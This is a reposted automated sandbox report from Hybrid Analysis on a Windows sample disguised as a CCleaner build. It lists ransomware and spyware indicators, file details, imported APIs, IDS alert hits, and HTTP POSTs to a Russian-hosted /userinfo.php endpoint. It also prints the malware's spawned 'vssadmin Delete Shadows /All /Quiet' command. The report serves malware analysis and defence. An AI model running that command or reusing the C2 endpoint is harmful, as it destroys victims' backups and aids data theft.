zcuSHbuD2Wn3.exe

转自：https://www.hybrid-analysis.com/sample/f41d0e00ffe1f8932eda937bb8d32a83c8992c1f596bd3a741c08190925c9e64?environmentId=1

zcuSHbuD2Wn3.exe

Analyzed on April 28th 2016 06:45:03 (CEST) to Windows 7 32 bit
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by VxStream Sandbox v4.10 © Payload Security

Attention: this analysis ran with the legacy Usermode Monitor. It ishighly recommended to use the Kernelmode Monitor.

Incident Response

Risk Assessment

Remote Access

Contains ability to listen for incoming connections

Spyware/Leak

POSTs files to a webserver

Ransomware

The input sample dropped a known ransomware file
Deletes volume snapshots (often used by Ransomware)

Fingerprint

Reads the cryptographic machine GUID
Contains ability to lookup the windows account name

Network Behavior

Contacts 1 host. View the network section for more details.

Indicators

Not all malicious and suspicious indicators are displayed. Get your owncloud service or thefull version to view all details.

• Malicious Indicators 9

• External Systems
  • Detected Emerging Threats Alert
  • Sample was identified as malicious by at least one Antivirus engine
• Installation/Persistance
  • Allocates virtual memory in foreign process
  • Writes data to a remote process
• Spyware/Information Retrieval
  • Accesses potentially sensitive information from local browsers
• Unusual Characteristics
  • Contains native function calls
• Hiding 3 Malicious Indicators
  • All indicators are available only in the private webservice or standalone version

• Suspicious Indicators 25

• Anti-Detection/Stealthyness
  • Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
  • Sets the process error mode to suppress error box
• Anti-Reverse Engineering
  • Contains ability to register a top-level exception handler (often used as anti-debugging trick)
  • PE file has unusual entropy sections
• Environment Awareness
  • Contains ability to query the machine version
  • Reads the cryptographic machine GUID
• External Systems
  • Detected Emerging Threats Alert
• General
  • POSTs files to a webserver
• Installation/Persistance
  • Creates/touches files in windows directory
  • Monitors specific registry key for changes
• Network Related
  • Found potential IP address in binary/memory
  • Uses a User Agent typical for browsers, although no browser was ever launched
• System Destruction
  • Opens file with deletion access rights
• System Security
  • Contains ability to elevate privileges
  • Modifies proxy settings
• Unusual Characteristics
  • Imports suspicious APIs
  • Reads information about supported languages
• Hiding 8 Suspicious Indicators
  • All indicators are available only in the private webservice or standalone version

• Informative 12

• Environment Awareness
  • Contains ability to query machine time
  • Contains ability to query volume size
• General
  • Contacts server
  • Contains PDB pathways
  • Creates mutants
  • Loads modules at runtime
  • Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)
  • Runs shell commands
  • Spawns new processes
• Installation/Persistance
  • Contains ability to lookup the windows account name
  • Dropped files
• Network Related
  • Found potential URL in binary/memory

File Details

All Details:

zcuSHbuD2Wn3.exe

Filename

zcuSHbuD2Wn3.exe

Size

176KiB (179712 bytes)

Type

PE32 executable (GUI) Intel 80386, for MS Windows

Architecture

32 Bit

SHA256

f41d0e00ffe1f8932eda937bb8d32a83c8992c1f596bd3a741c08190925c9e64

Resources

Language

ENGLISH

Icon

Visualization

Input File (PortEx)

Version Info

LegalCopyright

Copyright 2005-2015 Piriform Ltd

InternalName

ecleaner

FileVersion

5, 11, 00, 5408

CompanyName

Piriform Ltd

Comments

CCleaner

ProductName

ECleaner

ProductVersion

5, 11, 00, 5408

FileDescription

ECleaner

OriginalFilename

ecleaner.exe

Translation

0x0409 0x04b0

Classification (TrID)

• 42.1% (.EXE) Win32 Executable MS Visual C++ (generic)
• 37.3% (.EXE) Win64 Executable (generic)
• 8.8% (.DLL) Win32 Dynamic Link Library (generic)
• 6.0% (.EXE) Win32 Executable (generic)
• 2.7% (.EXE) Generic Win/DOS Executable

File Sections

NameEntropyVirtual AddressVirtual SizeRaw SizeMD5.text7.194165789850x10000xd81c0xda00dc477c948bb1c3b2b02a2c06f21bce41.rdata7.005229954260xf0000x607e0x6200ba119d8969b22deb95fff87151770dcc.data5.738886961640x160000x1ffcc0xa0006931d76d06e9f6cfb66eed2c7ea6822d.rsrc6.061237607020x360000xb2d80xb400a46d31563c53ef2608cc13435e0bdf8a.reloc5.745738377610x420000x28be0x2a00ae2bce3b3de378760313167964be2a7b

File Imports

• ADVAPI32.dll
• KERNEL32.dll
• msvcrt.dll
• ole32.dll
• oledlg.dll
• PSAPI.DLL
• SHELL32.dll
• SHLWAPI.dll
• USER32.dll
• USERENV.dll
• VERSION.dll
• WTSAPI32.dll

BuildExplicitAccessWithNameW

ChangeServiceConfigW

CloseServiceHandle

ControlService

CreateProcessAsUserW

CreateServiceW

DeleteService

DeregisterEventSource

DuplicateTokenEx

EnumDependentServicesW

GetNamedSecurityInfoW

GetTokenInformation

OpenProcessToken

OpenSCManagerW

OpenServiceW

QueryServiceStatusEx

RegCloseKey

RegCreateKeyExW

RegCreateKeyW

RegEnumKeyW

RegisterEventSourceW

RegisterServiceCtrlHandlerExW

RegOpenKeyExW

RegOpenKeyW

RegQueryValueExW

RegSetValueExW

ReportEventW

RevertToSelf

SetEntriesInAclW

SetNamedSecurityInfoW

SetServiceStatus

SetTokenInformation

StartServiceCtrlDispatcherW

StartServiceW

Screenshots

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 3 processes in total (System Resource Monitor).

• zcuSHbuD2Wn3.exe (PID: 3824)
  • vssadmin.exe Delete Shadows /All /Quiet (PID: 1128)
  • cmd.exe /C del /Q /F "%TEMP%\sysE574.tmp" (PID: 2984)

Reduced MonitoringContains StreamsMemory Dumps Available

Network Analysis

DNS Requests

No relevant DNS requests were made.

Contacted Hosts

Host AddressHost PortHost ProtocolHost Details31.41.44.24680TCPRussian Federation
ASN: 49505 (OOO Network of data-centers Selectel)

Port Protocol Description
Port 80: Hypertext Transfer Protocol (HTTP)

Contacted Countries

HTTP Traffic

EndpointMethod/ResponseURL/CodeData31.41.44.246:80POST/userinfo.phpPOST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 423Connection: Keep-AliveCache-Control: no-cacheRaw hex: 96FB7447BC33B71634CFBFA0BC46CE2D94AA40AF9A125BF5B99B4C3940DDD8750F8A45D6555554220AA503AD9B08833514BCBA7E42EC5E25B14EF483CF7C3...31.41.44.246:80POST/userinfo.phpPOST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 190Connection: Keep-AliveCache-Control: no-cacheReadable: &bRaw hex: E226620EA2118C63F2CF235B2EB6AD65312A4499FCCD2FC10052507883AB6A4F4E937DD6AFEECE1DBA126ABB9CFB818C1D7BBFBCD35ED50CA3427F4BA1715...31.41.44.246:80POST/userinfo.phpPOST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 318Connection: Keep-AliveCache-Control: no-cacheRaw hex: 878C60B9709321AF10554F60EF3C01F67905EBBA9186A884E5C127870551E15482B43405CBF383B2DF08CAA2FAF0052B6591552E040902634AC2673AC3A64...31.41.44.246:80POST/userinfo.phpPOST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 397Connection: Keep-AliveCache-Control: no-cacheRaw hex: A0ADFDB6513C895D535C72667B75C686D27D9BBCEEE089F0506E283985CFA0814B7428CF7F18BB28EA50D17FBBDF01A17B19E0BC53D23D75E1ED99B66A783...

Emerging Threats

EventCategoryDescriptionSID31.41.44.246:80 (TCP)A Network Trojan was detectedET TROJAN Generic - POST To .php w/Extended ASCII Characters201725931.41.44.246:80 (TCP)Potentially Bad TrafficET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1201835831.41.44.246:80 (TCP)A Network Trojan was detectedET TROJAN Generic - POST To .php w/Extended ASCII Characters201725931.41.44.246:80 (TCP)A Network Trojan was detectedET TROJAN Win32/Necurs Common POST Header Structure202199531.41.44.246:80 (TCP)Potentially Bad TrafficET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1201835831.41.44.246:80 (TCP)A Network Trojan was detectedET TROJAN Generic - POST To .php w/Extended ASCII Characters201725931.41.44.246:80 (TCP)Potentially Bad TrafficET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1201835831.41.44.246:80 (TCP)A Network Trojan was detectedET TROJAN Generic - POST To .php w/Extended ASCII Characters201725931.41.44.246:80 (TCP)Potentially Bad TrafficET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 12018358

ET rules applied using Suricata.

Extracted Strings